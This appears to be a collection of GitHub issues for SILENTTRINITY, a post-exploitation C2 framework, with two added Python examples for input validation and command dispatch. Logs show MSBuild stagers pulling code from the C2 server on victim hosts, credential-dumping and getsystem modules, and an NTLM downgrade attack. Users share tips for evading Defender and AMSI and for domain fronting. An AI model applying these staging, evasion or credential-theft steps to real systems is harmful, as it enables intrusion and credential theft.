byt3bl33d3r / silenttrinity
An asynchronous, collaborative post-exploitation agent powered by Python and .NET's DLR
License: GNU General Public License v3.0
Hello @byt3bl33d3r,
It would be cool if all the actions and results could be logged, just like the spool command with Metasploit.
Cheers dude!
EDIT: I see that this feature is already possible but not enabled; a user option is more than welcome.
Line 154 in 907eee2
Add an interactive shell module that essentially drops you into a Windows-like shell (instead of having to set the 'command' option in the cmd module).
Alternatively (or in addition), add the ability to control the beacon timing (such that I can set it to 1, and get almost immediate responses).
Will the Wiki be updated? How can I submit pages to the Wiki? Example: https://github.com/davidtavarez/SILENTTRINITY/wiki/Generating-stagers
Hey there!
Is it possible to update Mimikatz to version 2.1.1-20181209?
Thanks in advance!
Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.
Run a PowerShell command.
Throws an error:
Exception when executing command run_ipy_script: The type initializer for 'System.Management.Automation.Runspaces.InitialSessionState' threw an exception.
Used msbuild to create agent. I cannot run any command, whether it's just 'dir' or 'ping', I get the same error.
ST (modules)(ipy/powershell) ≫ [2019-02-08 15:58:44,850] 192.168.1.167:50998 POST /aa219fb6-8e99-4e23-a7e4-1142a83a5590 1.1 200 748 19450
INFO:quart.serving:192.168.1.167:50998 POST /aa219fb6-8e99-4e23-a7e4-1142a83a5590 1.1 200 748 19450
[2019-02-08 15:58:44,925] DEBUG in http: Session aa219fb6-8e99-4e23-a7e4-1142a83a5590 (192.168.1.167) checked in
DEBUG:quart.app:Session aa219fb6-8e99-4e23-a7e4-1142a83a5590 (192.168.1.167) checked in
ST (modules)(ipy/powershell) ≫ [2019-02-08 15:58:44,933] 192.168.1.167:50998 GET /aa219fb6-8e99-4e23-a7e4-1142a83a5590/jobs 1.1 200 1456 7964
INFO:quart.serving:192.168.1.167:50998 GET /aa219fb6-8e99-4e23-a7e4-1142a83a5590/jobs 1.1 200 1456 7964
ST (modules)(ipy/powershell) ≫ [2019-02-08 15:58:45,315] 192.168.1.167:50998 POST /aa219fb6-8e99-4e23-a7e4-1142a83a5590 1.1 200 747 26288
INFO:quart.serving:192.168.1.167:50998 POST /aa219fb6-8e99-4e23-a7e4-1142a83a5590 1.1 200 747 26288
[2019-02-08 15:58:45,389] DEBUG in http: Session aa219fb6-8e99-4e23-a7e4-1142a83a5590 posted results of job odTHLXlJ
DEBUG:quart.app:Session aa219fb6-8e99-4e23-a7e4-1142a83a5590 posted results of job odTHLXlJ
[+] aa219fb6-8e99-4e23-a7e4-1142a83a5590 returned job result (id: odTHLXlJ)
Exception when executing command run_ipy_script: The type initializer for 'System.Management.Automation.Runspaces.InitialSessionState' threw an exception.
ST (modules)(ipy/powershell) ≫ [2019-02-08 15:58:45,399] 192.168.1.167:50998 POST /aa219fb6-8e99-4e23-a7e4-1142a83a5590/jobs/odTHLXlJ 1.1 200 0 17911
INFO:quart.serving:192.168.1.167:50998 POST /aa219fb6-8e99-4e23-a7e4-1142a83a5590/jobs/odTHLXlJ 1.1 200 0 17911
Establish a session between a victim Windows 10 host and the ST server running on Kali OS.
When executing msbuild.exe on the generated msbuild.xml file, it fetches the stage.zip successfully but fails to build.
Error is listed below.
Please provide detailed steps for reproducing the issue.
Windows 10 x64 client:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe 'C:\Users\tester\Desktop\msbuild.xml'
Microsoft (R) Build Engine version 4.7.3056.0
[Microsoft .NET Framework, version 4.0.30319.42000]
Copyright (C) Microsoft Corporation. All rights reserved.
Build started 26/3/2019 11:39:47 PM.
URL: https://192.168.0.120/6b13fcdf-de84-4c81-986e-11fe20f43332
Trying to resolve assemblies by staging zip
Attempting HTTP POST to https://192.168.0.120/6b13fcdf-de84-4c81-986e-11fe20f43332
Attempting HTTP GET to https://192.168.0.120/6b13fcdf-de84-4c81-986e-11fe20f43332
Downloaded 2068160 bytes
Found Microsoft.Scripting.dll in zip
'Microsoft.Scripting, Version=1.2.0.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Found IronPython.dll in zip
'IronPython, Version=2.7.8.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Found Microsoft.Scripting.dll in zip
'Microsoft.Scripting, Version=1.2.0.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Project "C:\Users\tester\Desktop\msbuild.xml" on node 1 (default targets).
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: The "ST" task failed unexpectedly.\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: System.MissingMethodException: Method not found: 'Microsoft.Sc
ripting.Hosting.ScriptRuntimeSetup IronPython.Hosting.Python.CreateRuntimeSetup(System.Collections.Generic.IDictionary`
2<System.String,System.Object>)'.\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: at ST.CreateEngine()\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: at ST.RunIPYEngine()\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: at ST.Main(String[] args)
Done Building Project "C:\Users\tester\Desktop\msbuild.xml" (default targets) -- FAILED.
Build FAILED.
"C:\Users\tester\Desktop\msbuild.xml" (default target) (1) ->
(Hello target) ->
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: The "ST" task failed unexpectedly.\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: System.MissingMethodException: Method not found: 'Microsoft.Sc
ripting.Hosting.ScriptRuntimeSetup IronPython.Hosting.Python.CreateRuntimeSetup(System.Collections.Generic.IDictionary`
2<System.String,System.Object>)'.\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: at ST.CreateEngine()\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: at ST.RunIPYEngine()\r
C:\Users\tester\Desktop\msbuild.xml(5,5): error MSB4018: at ST.Main(String[] args)
0 Warning(s)
1 Error(s)
Time Elapsed 00:08:15.00
No error from st.py running on my Kali OS.
Able to see the staging established successfully.
Kali OS:
ST (stagers)(msbuild) ≫ generate https
[+] Generated stager to msbuild.xml
[] Launch with 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml'
[] Sending stage (2068193 bytes) -> 192.168.0.111 ...
ST (stagers)(msbuild) ≫
Hey byt3bl33d3r,
big fan of your work,
I notice in /module/src/safetykatz.py
the output folder destination "{0}\Temp\debug.bin" gets blocked by default on my Windows 10.
I changed it to:
dumpFile = "{0}\system32\spool\drivers\color\debug.bin".format(systemRoot)
And it works, continue the good work!!
Thanks for the awesome work!
I tried to set up/install ST on Kali Linux arm and amd64 following your step-by-step instructions; however, the dependencies fail to install.
OS
Linux nix 4.19.0-kali4-amd64 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) x86_64 GNU/Linux
errors:
An error occurred while installing aiofiles==0.4.0
An error occurred while installing cryptography==2.7
An error occurred while installing hypercorn==0.6.0
An error occurred while installing hyperframe==5.2.0
An error occurred while installing multidict==4.5.2
An error occurred while installing pycparser==2.19
As per your instructions, python3.7 is installed; I also tried pipenv, which throws similar issues.
git clone https://github.com/byt3bl33d3r/SILENTTRINITY
pip3 install pipenv && pipenv install && pipenv shell
Any suggestions or ideas? Thanks
I fired up my Windows 10 test VM just now and received an update for the Defender Virus & Threat setting (March 4, 2019). Launched the msbuild.xml file and Defender popped a Threat Notification. 2 days ago, Defender did not catch it... yet.
Behavior: Win32/Quiltan.A!sms
Recommended action: Quarantine threat now.
Windows Defender as of March 4, 2019 is picking up msbuild.xml being executed. Renaming the msbuild.xml file did not change anything.
Defender is blocking backdoor connection back to Kali Silenttrinity.
Please include any relevant log snippets or files here. Try using: python3.7 st.py -d to get more information.
Expected help on sessions, or an error about a non-existent option...
st.py server crashed when running 'sessions -h'
ST (sessions) ≫ sessions -h
Traceback (most recent call last):
File "st.py", line 163, in <module>
loop()
File "st.py", line 140, in __call__
self.parse_result(result)
File "st.py", line 95, in parse_result
bound_cmd_handler = functools.partial(getattr(self.current_context, command[0]), args=command[1:])
TypeError: the first argument must be callable
I keep forgetting I need to 'start' listeners vs. 'run' modules. It would be nice if ST were a little more forgiving, and both 'run' and 'start' worked to kick off a listener.
Along those same lines, it would be nice if commands were not case sensitive. For instance, when setting a listening port, "set port 8080" throws an 'unknown option port' error because the 'P' was not capitalized.
Try running a listener with the run command. It won't start. Likewise when setting a port with a lower case 'p'.
Sessions run modules/tasks asynchronously; the way this is currently implemented (threads) has the unfortunate consequence of mixing up modules' output if more than one is running at the same time, because we're just hooking STDOUT using Console.SetOutput() (https://github.com/byt3bl33d3r/SILENTTRINITY/blob/master/core/teamserver/data/stage.boo#L359-L379).
We really have only two options (unless I'm missing something obvious) to fix this:
1. ... print statement for a module's output, but this would complicate the code considerably.
2. Pass a StringBuilder() object to each module and append the output to it (this would allow us to keep using threads, but we won't be able to use the print statement anymore to handle output, which is really pretty).
Like the title says, I just want to ask if it is possible to implement renaming the agent after it pops up, like in Empire?!
Thanks for the amazing work, and like I already said on Twitter, you are an amazing coder and pentester, one of the best!!! And all your GitHub proves it!!!
Hi, I'd like to report what I think could be a bug and a couple of suggestions (not feature requests; I know a PR is the right path for that). Thanks in advance.
Receive a stager once the .exe file is run under Windows (AV is off). It was working yesterday and is failing today, so it seems to be some kind of bug.
Another expected behavior is to be able to run the "sessions" command without seeing any error, even without any active session.
Just a timeout. It worked for me yesterday, but after doing a git pull with the commits done today it is not working anymore. It is hard to tell you exactly which version due to the messy versioning method. As a suggestion, I could say that commits to master shouldn't be allowed (the branch can be protected on GitHub) and after some commits on a dev branch, a PR to master could be done and tagged as a new version. In this way it is easier for you and for users to track what is happening and when. A CHANGELOG.md file could also help here. The sha1 of the commit on which I'm testing is b43044f2a343ff497ea9d1c931401a6523074904
On the screenshot you can see (upper-left) an error shown on the teamserver console after launching a simple "sessions" command while there is no active session.
python3 teamserver.py 192.168.0.161 xxxxxxx
python3 st.py wss://elvis:[email protected]:5000
listeners, use https, options, start https
stagers, use exe, generate https
stager.exe 206e3d7a-8df6-4c73-bdb7-9a6cd38ce24e 84e8b494da44aa861e11cc67d35dde9fa92230698d015c1eb67b40e6d2ae5f2b https://192.168.0.161
As a final suggestion I can say that after creating the .exe stager... it is hard to know what the guid and the psk are. As you can see in the screenshot (bottom-right), I opened the sqlite db to get the right values. It would be nice to print the right values on the client C&C screen once the stager is created, to avoid that manual search for the right values.
Thanks! This tool seems promising!
Currently, the Mimikatz module embeds a custom version of SharpSploit to load and execute the Mimikatz DLLs in memory (it's just calling Assembly.Load() on it). From an Opsec perspective this sucks cause it's a static assembly, doesn't get dynamically compiled on the endpoint and it's just another thing AMSI can trigger on in .NET 4.8.
Ideally I would LOVE to port over the SharpSploit PE Loading code to Boolang so this entire issue goes away but it's def not trivial and is going to require a decent amount of time.
Hey,
Is it possible to add mshta-based exploits? Generating HTML applications and running them with mshta shouldn't be a problem, I guess.
jeff@blue:~/dev/SILENTTRINITY$ git branch
* master
jeff@blue:~/dev/SILENTTRINITY$ git rev-parse HEAD
c3b397d85dbb471c4f202151d30100e4222215eb
master branch
Either as BindIP is set, or before saying the server has been started with the start command, I'd expect ST to validate that the BindIP given is one that can be bound.
Currently there's no feedback given about improper BindIP options in the client:
[1] ST (listeners)(http) ≫ options
┌Listener Options─────────┬───────────────────────────┬───────────────────────────────────────────────┐
│ Option Name │ Required │ Value │ Description │
├──────────────┼──────────┼───────────────────────────┼───────────────────────────────────────────────┤
│ Name │ True │ http │ Name for the listener. │
├──────────────┼──────────┼───────────────────────────┼───────────────────────────────────────────────┤
│ BindIP │ True │ 192.168.252.192.168.252.1 │ The IPv4/IPv6 address to bind to. │
├──────────────┼──────────┼───────────────────────────┼───────────────────────────────────────────────┤
│ Port │ True │ 80 │ Port for the listener. │
├──────────────┼──────────┼───────────────────────────┼───────────────────────────────────────────────┤
│ CallBackURls │ False │ │ Additional C2 Callback URLs (comma seperated) │
├──────────────┼──────────┼───────────────────────────┼───────────────────────────────────────────────┤
│ Comms │ True │ http │ C2 Comms to use │
└──────────────┴──────────┴───────────────────────────┴───────────────────────────────────────────────┘
The stager does give the following errors:
From PowerShell stager:
[*] Attempting HTTP POST to http://192.168.252.192.168.252.1/705213ab-e9e7-4f0d-8942-5b61719af2f4
[-] Attempt #1
[!] The remote name could not be resolved: '192.168.252.192.168.252.1'
[-] Attempt #2
[!] The remote name could not be resolved: '192.168.252.192.168.252.1'
BindIP
start command
I think I've given all the relevant logs in Failure Information, but I can provide more information if needed.
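As an added example (not SILENTTRINITY's own code), this is how a client could validate BindIP at `set` time, as the report above asks, and also match option names case-insensitively, as the earlier 'set port 8080' report asks. The option names come from the Listener Options table above; the default values, the validation logic and the function names are assumptions made for this example.

```python
"""Validate listener options client-side instead of letting a bad BindIP
surface only as an unresolvable URL inside the stager."""
from __future__ import annotations

import ipaddress
import socket

# Option names copied from the page's 'Listener Options' table; the default
# values are constructed for this example.
LISTENER_OPTIONS = {
    "Name": "http",
    "BindIP": "0.0.0.0",
    "Port": "80",
    "CallBackURls": "",
    "Comms": "http",
}


def validate_bind_ip(value: str) -> tuple[bool, str]:
    """Return (ok, message).

    ok is True only when value is a syntactically valid IPv4/IPv6 literal
    AND this host can actually bind a socket to it. The doubled address from
    the report ('192.168.252.192.168.252.1') fails the first check; an
    address that belongs to no local interface fails the second.
    """
    try:
        addr = ipaddress.ip_address(value)
    except ValueError:
        return False, f"{value!r} is not a valid IPv4/IPv6 address"

    family = socket.AF_INET if addr.version == 4 else socket.AF_INET6
    try:
        with socket.socket(family, socket.SOCK_STREAM) as sock:
            # Port 0 lets the OS pick an ephemeral port, so this probes only
            # whether the address is bindable, without touching the real port.
            sock.bind((value, 0))
    except OSError as exc:
        return False, f"cannot bind to {value}: {exc.strerror}"
    return True, f"{value} is a bindable local address"


def set_option(options: dict, name: str, value: str) -> str:
    """Set an option by case-insensitive name, validating BindIP and Port.

    Returns the canonical option name that was set; raises KeyError for an
    unknown option and ValueError for a value that fails validation, so the
    caller can print a message instead of silently storing a bad value.
    """
    matches = [key for key in options if key.lower() == name.lower()]
    if not matches:
        raise KeyError(f"unknown option {name!r}")
    key = matches[0]

    if key == "BindIP":
        ok, message = validate_bind_ip(value)
        if not ok:
            raise ValueError(message)
    elif key == "Port":
        port = int(value)  # non-numeric input raises ValueError itself
        if not 0 < port < 65536:
            raise ValueError(f"port {value} is out of range 1-65535")

    options[key] = value
    return key


if __name__ == "__main__":
    opts = dict(LISTENER_OPTIONS)
    print(set_option(opts, "port", "8080"), opts["Port"])
    for candidate in ("127.0.0.1", "192.168.252.192.168.252.1"):
        try:
            set_option(opts, "bindip", candidate)
            print("accepted", candidate)
        except ValueError as err:
            print("rejected:", err)
```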
Hey,
I would love to see cmedb get integrated with ST. Normally I wouldn't have asked this, but since you're the creator of both these awesome tools, it made sense.
When a new session is connected, SSLErrors start spamming out.
However, the session remains alive and can run modules without problems.
It seems ST is unforgiving and particular when it comes to special characters in the shell module's Command option. For instance, in order to successfully get a directory listing of C:\ your command must be "dir C:\\" or it won't work. Furthermore, I have yet to figure out how to handle spaces, so I can't list the contents of something like "C:\Program Files" (I tried escaping the space with a backslash, two backslashes, quotation marks around the whole thing, escaping those quotation marks, etc.).
Ultimately it would be nice if the end user didn't have to figure out proper escaping. For instance:
set Command dir "C:\Program Files"
If that's not possible, due to how you are processing module parameters, then maybe the next best thing is to include proper escaping techniques in the "Command" option description (listed when you type "options").
HTTPS Listener on 8080
MSBuild stager executed on Windows Server 2016 client
Module = ipy/shell
Doing a test with ST.
Everything ran fine... until I got this (Windows side):
PS C:\Users\ddd\Documents> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml
Microsoft (R) Build Engine, version 4.7.3056.0
[Microsoft .NET Framework, Version 4.0.30319.42000]
Copyright (C) Microsoft Corporation. Tous droits réservés.
La génération a démarré 01/08/2019 16:56:07.
URL: http://xxxx/fcc70e90-bef1-4e8a-8348-9e2bbd1b6f60
Trying to resolve assemblies by staging zip
Attempting HTTP POST to http://xxxx/fcc70e90-bef1-4e8a-8348-9e2bbd1b6f60
Attempting HTTP GET to http://xxxx/fcc70e90-bef1-4e8a-8348-9e2bbd1b6f60
Downloaded 1950224 bytes
Found Microsoft.Scripting.dll in zip
'Microsoft.Scripting, Version=1.2.2.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Found IronPython.dll in zip
'IronPython, Version=2.7.9.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Found Microsoft.Dynamic.dll in zip
'Microsoft.Dynamic, Version=1.2.2.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Found IronPython.Modules.dll in zip
'IronPython.Modules, Version=2.7.9.0, Culture=neutral, PublicKeyToken=7f709c5b713576e1' loaded
Did not find IPY stdlib in embedded resources: La séquence ne contient aucun élément.
Found IronPython.dll in zip
Found Main.py in zip
And then no session is created on ST.
I apologize if it's my fault because I missed something... but I can't figure out what by now.
Thanks
Please describe the behavior you are expecting.
What is the current behavior?
Please help provide information about the failure if this is a bug. If it is not a bug, please remove the rest of this template.
Setup:
The listener should open the port configured in the "listeners/http" setup.
After setting up the listener and starting it, it doesn't open the port and the target host cannot reach the listener handler.
Starting the listener (Debug info from the teamserver):
2019-08-17 16:38:02,073 3296 MainThread - [DEBUG] protocol.py: write_frame - server >
Frame(fin=True, opcode=1, data=b'{"type": "message",
"id": "wfH3LrCwSx",
"ctx": "listeners",
"name": "list",
"status": "success",
"result": {"http": {"name": "http",
"author": "@byt3bl33d3r",
"description": "HTTP listener",
"running": true,
"options": {"Name": {"Description": "Name for the listener.",
"Required": true,
"Value": "listen_http"},
"BindIP": {"Description": "The IPv4/IPv6 address to bind to.",
"Required": true,
"Value": "10.0.2.15"},
"Port": {"Description": "Port for the listener.",
"Required": true,
"Value": "8123"},
"Comms": {"Description": "C2 Comms to use",
"Required": true,
"Value": "http"}}}}}', rsv1=False, rsv2=False, rsv3=False)
Stopping the listener (Debug info from the teamserver):
2019-08-17 16:39:40,705 3296 MainThread - [DEBUG] protocol.py: write_frame - server >
Frame(fin=True, opcode=1, data=b'{"type": "message",
"id": "RyPmvQyfgV",
"ctx": "listeners",
"name": "stop",
"status": "success",
"result": null}', rsv1=False, rsv2=False, rsv3=False)
python3 st.py wss://username:[email protected]:5000
listeners
use http
set Port 8123
start
list
Out-CompressedDll -FilePath SILENTTRINITY_DLL.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml
When I use the default b64 string from the template msbuild.xml there is no error, but when I use the one from the compiled project, the b64 is not working.
Error with the base64 of SILENTTRINITY_DLL.dll
Ps$> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml
Microsoft (R) Build Engine, version 4.8.3761.0
[Microsoft .NET Framework, Version 4.0.30319.42000]
Copyright (C) Microsoft Corporation. Tous droits réservés.
La génération a démarré 25/05/2019 19:12:10.
Projet "C:\Users\bonclay\Desktop\msbuild.xml" sur le noud 1 (cibles par défaut).
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: Échec inattendu de la tâche "ST".\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: System.ArgumentException: Impossible de convert
ir l'objet de type 'System.String[]' en type 'System.String'.\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à System.RuntimeType.TryChangeType(Object va
lue, Binder binder, CultureInfo culture, Boolean needsSpecialCast)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à System.Reflection.MethodBase.CheckArgument
s(Object[] parameters, Binder binder, BindingFlags invokeAttr, CultureInfo culture, Signature sig)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à System.Reflection.RuntimeMethodInfo.Invoke
ArgumentsCheck(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo cultu
re)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à System.Reflection.RuntimeMethodInfo.Invoke
(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à System.Reflection.MethodBase.Invoke(Object
obj, Object[] parameters)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à InlineCode.ST.Execute() dans c:\Users\bonc
lay\AppData\Local\Temp\cqxgsizt.0.cs:ligne 63\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à Microsoft.Build.BackEnd.TaskExecutionHost.
Microsoft.Build.BackEnd.ITaskExecutionHost.Execute()\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à Microsoft.Build.BackEnd.TaskBuilder.<Execu
teInstantiatedTask>d__26.MoveNext()
Génération du projet "C:\Users\bonclay\Desktop\msbuild.xml" terminée (cibles par défaut) -- ÉCHEC.
ÉCHEC de la build.
"C:\Users\bonclay\Desktop\msbuild.xml" (cible par défaut) (1) ->
(Hello1231231321321321 cible) ->
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: Échec inattendu de la tâche "ST".\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: System.ArgumentException: Impossible de convert
ir l'objet de type 'System.String[]' en type 'System.String'.\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à System.RuntimeType.TryChangeType(Object va
lue, Binder binder, CultureInfo culture, Boolean needsSpecialCast)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à System.Reflection.MethodBase.CheckArgument
s(Object[] parameters, Binder binder, BindingFlags invokeAttr, CultureInfo culture, Signature sig)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à System.Reflection.RuntimeMethodInfo.Invoke
ArgumentsCheck(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo cultu
re)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à System.Reflection.RuntimeMethodInfo.Invoke
(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à System.Reflection.MethodBase.Invoke(Object
obj, Object[] parameters)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à InlineCode.ST.Execute() dans c:\Users\bonc
lay\AppData\Local\Temp\cqxgsizt.0.cs:ligne 63\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à Microsoft.Build.BackEnd.TaskExecutionHost.
Microsoft.Build.BackEnd.ITaskExecutionHost.Execute()\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: à Microsoft.Build.BackEnd.TaskBuilder.<Execu
teInstantiatedTask>d__26.MoveNext()
Is it possible to add a local / remote port forwarding feature?
HTTPS Listener on 8080
MSBuild stager executed on Windows Server 2016 client, under the context of a domain user in the local administrators group
Module = ipy/mimikatz
run all
Output:
[+] f83a38c9-14fe-44ad-870f-2d70fc3e24e7 returned job result (id: LJpKMPve)
[-] Not in high integrity process
ST should attempt to elevate privileges to SYSTEM before running Mimikatz and/or any LSASS-related modules. Alternatively, create a separate module (such as MSF 'get system') which would achieve this purpose.
Even if the session is running under the context of a user in the administrators group, LSASS modules fail to execute (dump memory).
When trying to navigate through the CLI, typing an invalid option causes the CLI to crash.
Either going to the modules menu or the application giving an error message.
Python crashes.
ST (modules)(ipconfig) ≫ modules
ST (modules)(ipconfig) ≫ sessions
ST (sessions) ≫ sessions modules
Traceback (most recent call last):
File "st.py", line 143, in <module>
loop()
File "st.py", line 120, in __call__
self.parse_result(result)
File "st.py", line 94, in parse_result
bound_cmd_handler = functools.partial(getattr(self.current_context, command[0]), args=command[1:])
TypeError: the first argument must be callable
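Both tracebacks on this page (the 'sessions -h' crash earlier and the 'sessions modules' one just above) end the same way: getattr() on the current context returns something that is not callable, and functools.partial raises TypeError, which nothing catches, so the client dies. As an added example, not code from st.py, here is a dispatcher that checks callable() before binding and answers with a usage message instead; ExampleContext and its commands are constructed for the example.

```python
"""A crash-safe command dispatcher for a context-based CLI."""
import functools


class ExampleContext:
    """Stand-in for a CLI context (constructed for this example).

    It deliberately has a data attribute named like a context ('sessions'),
    so that typing 'sessions ...' while inside it resolves to a dict, which
    is exactly the non-callable that made functools.partial raise.
    """
    name = "sessions"

    def __init__(self):
        self.sessions = {}  # data attribute, not a command

    def list(self, args):
        return f"{len(self.sessions)} session(s)"

    def info(self, args):
        if not args:
            raise ValueError("usage: info <guid>")
        return f"info for {args[0]}"


def public_commands(ctx):
    """Names of the callables on ctx that a user is allowed to invoke."""
    return sorted(
        name for name in dir(ctx)
        if not name.startswith("_") and callable(getattr(ctx, name))
    )


def dispatch(ctx, command):
    """Resolve command[0] on ctx and run it with the remaining words.

    Unlike a bare functools.partial(getattr(...)), this refuses unknown
    names, private names and non-callable attributes with a message, and
    turns a handler's ValueError into a usage line rather than a traceback.
    """
    if not command:
        return "no command given"
    name, args = command[0], command[1:]

    # 'anything -h' lists the commands of the current context.
    if args and args[0] in ("-h", "--help"):
        return f"commands in {ctx.name}: " + ", ".join(public_commands(ctx))

    handler = getattr(ctx, name, None)
    if name.startswith("_") or handler is None or not callable(handler):
        return f"unknown command {name!r} in context {ctx.name!r}"

    bound = functools.partial(handler, args=args)
    try:
        return bound()
    except ValueError as err:
        return str(err)


if __name__ == "__main__":
    ctx = ExampleContext()
    for line in (["sessions", "-h"], ["sessions", "modules"], ["list"], ["info"]):
        print(" ".join(line), "->", dispatch(ctx, line))
```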
Do you think you might be able to use COM interop to open the ZIP file using the "Shell.Application" COM interface?
Just a suggestion.
Is it possible to add additional headers for request to facilitate domain fronting? How can I hack the code to get this functionality?
jeff@blue:~/dev/SILENTTRINITY$ git branch
* master
jeff@blue:~/dev/SILENTTRINITY$ git rev-parse HEAD
c3b397d85dbb471c4f202151d30100e4222215eb
master branch
The stop command from within the listeners context should stop the listener.
Currently I wasn't able to stop a listener other than restarting teamserver.py
[1] ST ≫ listeners
[1] ST (listeners) ≫ use http
[1] ST (listeners)(http) ≫ set Port 8000
[1] ST (listeners)(http) ≫ list
[1] ST (listeners)(http) ≫ start
[1] ST (listeners)(http) ≫ list
┌Running────────────────────────────┐
│ Name │ URL │
├──────┼────────────────────────────┤
│ http │ http://10.153.143.148:8000 │
└──────┴────────────────────────────┘
[1] ST (listeners)(http) ≫ stop
[1] ST (listeners)(http) ≫ list
┌Running────────────────────────────┐
│ Name │ URL │
├──────┼────────────────────────────┤
│ http │ http://10.153.143.148:8000 │
└──────┴────────────────────────────┘
[1] ST (listeners)(http) ≫
A separate terminal window shows python3 is still listening:
jeff@blue:~/dev/SILENTTRINITY$ lsof -ni | grep :8000
python3 12973 jeff 23u IPv4 131287 0t0 TCP 10.153.143.148:8000 (LISTEN)
Start to finish is shown under Failure Information
I can provide more information if needed, but I think the above is enough to replicate this from scratch.
https://github.com/microsoft/ClearScript
Cause reasons :)
flake8 testing of https://github.com/byt3bl33d3r/SILENTTRINITY on Python 3.7.0
$ flake8 . --count --select=E901,E999,F821,F822,F823 --show-source --statistics
./Server/modules/src/mimikatz.py:37:49: E999 SyntaxError: invalid syntax
print "[+] Running in high integrity process"
^
./Server/modules/src/excelshellinject.py:11:39: E999 SyntaxError: invalid syntax
print "[*] Excel Version installed: {}".format(app_version)
^
./Server/modules/src/msgbox.py:7:14: E999 SyntaxError: invalid syntax
print 'Popped'
^
./Server/modules/src/powershell.py:31:23: E999 SyntaxError: invalid syntax
print PowerShellExecute("COMMAND_TO_RUN")
^
./Server/modules/src/safetykatz.py:39:49: E999 SyntaxError: invalid syntax
print "[+] Running in high integrity process"
^
./Server/modules/src/shell.py:9:45: E999 SyntaxError: invalid syntax
print "[*] Path: {} Command: {} Args: {}".format(Path, ShellCommandName, ShellCommandArguments)
^
./Server/modules/src/msilshellexec.py:267:21: E999 SyntaxError: invalid syntax
print "[*] Type : {}".format(type(assembly))
^
./Server/modules/src/execute-assembly.py:22:22: E999 SyntaxError: invalid syntax
print Encoding.UTF8.GetString(buffer, 0, buffer.Length)
^
./Server/data/stage.py:162:46: E999 SyntaxError: invalid syntax
if DEBUG: print "Running job (id: {})".format(job['id'])
^
9 E999 SyntaxError: invalid syntax
9
boo/internalmonologue doesn't show whether the hash is NTLMv1 or NTLMv2, and gives the wrong format for NTLMv2 hashes.
Upstream repo doesn't accept issues, so per conversation with @byt3bl33d3r I'm filing this here instead.
jeff@blue:~/dev/SILENTTRINITY$ git branch
* master
jeff@blue:~/dev/SILENTTRINITY$ git rev-parse HEAD
c3b397d85dbb471c4f202151d30100e4222215eb
master branch
If the internalmonologue attack fails to retrieve an NTLMv1 hash and has to show the NTLMv2 one instead, it should be in the right format.
Console output below. Victim is Windows 10 Enterprise 1809 as a VM, with Credential Guard enabled (using the Microsoft Device Guard readiness tool):
[1] ST (modules)(boo/internalmonologue) ≫ use boo/getsystem
[1] ST (modules)(boo/getsystem) ≫ run 3b42c305-a62d-4b6f-af79-de04691640f6
[*] [TS-gipaL] 3b42c305-a62d-4b6f-af79-de04691640f6 returned job result (id: qDkTV0bDZ4)
Getting system...
Impersonating NT AUTHORITY\SYSTEM...
Processes for NT AUTHORITY\SYSTEM: 37
Attempting to impersonate: NT AUTHORITY\SYSTEM
Successfully impersonated: NT AUTHORITY\SYSTEM
[1] ST (modules)(boo/getsystem) ≫ use boo/internalmonologue
[1] ST (modules)(boo/internalmonologue) ≫ run 3b42c305-a62d-4b6f-af79-de04691640f6
[*] [TS-gipaL] 3b42c305-a62d-4b6f-af79-de04691640f6 returned job result (id: mGySQy9xKR)
Running elevated
Performing NTLM Downgrade
Starting impersonation
